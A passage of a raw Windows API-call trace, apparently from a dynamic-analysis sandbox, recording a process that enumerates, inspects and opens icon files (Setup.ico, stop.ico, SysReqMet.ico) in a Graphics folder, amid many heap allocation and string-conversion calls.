lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.150] AreFileApisANSI () returned 1 [0062.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0062.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x66f40 [0062.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e068, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 41 [0062.150] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x8f66)) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.150] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.150] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.150] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="stop.ico", cAlternateFileName="")) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71ca0 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0062.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.151] AreFileApisANSI () returned 1 [0062.151] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico", lpUsedDefaultChar=0x0) returned 40 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.151] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0062.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.152] AreFileApisANSI () returned 1 [0062.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0062.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x6d478, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0062.152] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.152] GetFileType (hFile=0x41c) returned 0x1 [0062.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0062.152] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.152] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.153] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.153] CloseHandle (hObject=0x41c) returned 1 [0062.153] AreFileApisANSI () returned 1 [0062.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0062.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0062.153] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.153] GetFileType (hFile=0x41c) returned 0x1 [0062.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0062.153] CloseHandle (hObject=0x41c) returned 1 [0062.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0062.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.153] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.154] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.154] AreFileApisANSI () returned 1 [0062.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0062.154] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0062.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x6d210, cchWideChar=40 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\stop.ico") returned 40 [0062.154] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\stop.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\stop.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b5e7f00, ftCreationTime.dwHighDateTime=0x1ca927c, ftLastAccessTime.dwLowDateTime=0x5b5e7f00, ftLastAccessTime.dwHighDateTime=0x1ca927c, ftLastWriteTime.dwLowDateTime=0x5b5e7f00, ftLastWriteTime.dwHighDateTime=0x1ca927c, nFileSizeHigh=0x0, nFileSizeLow=0x2796)) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SysReqMet.ico", cAlternateFileName="SYSREQ~1.ICO")) returned 1 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.155] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.155] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0062.156] AreFileApisANSI () returned 1 [0062.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico", lpUsedDefaultChar=0x0) returned 45 [0062.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.156] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0062.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.156] AreFileApisANSI () returned 1 [0062.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.156] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0062.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0062.156] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.156] GetFileType (hFile=0x41c) returned 0x1 [0062.156] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0062.156] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.157] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.157] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.157] CloseHandle (hObject=0x41c) returned 1 [0062.157] AreFileApisANSI () returned 1 [0062.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0062.157] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0062.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 45 [0062.157] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.157] GetFileType (hFile=0x41c) returned 0x1 [0062.157] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0062.157] CloseHandle (hObject=0x41c) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.158] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.158] RtlAllocateHeap (HeapHandle=0x20000, 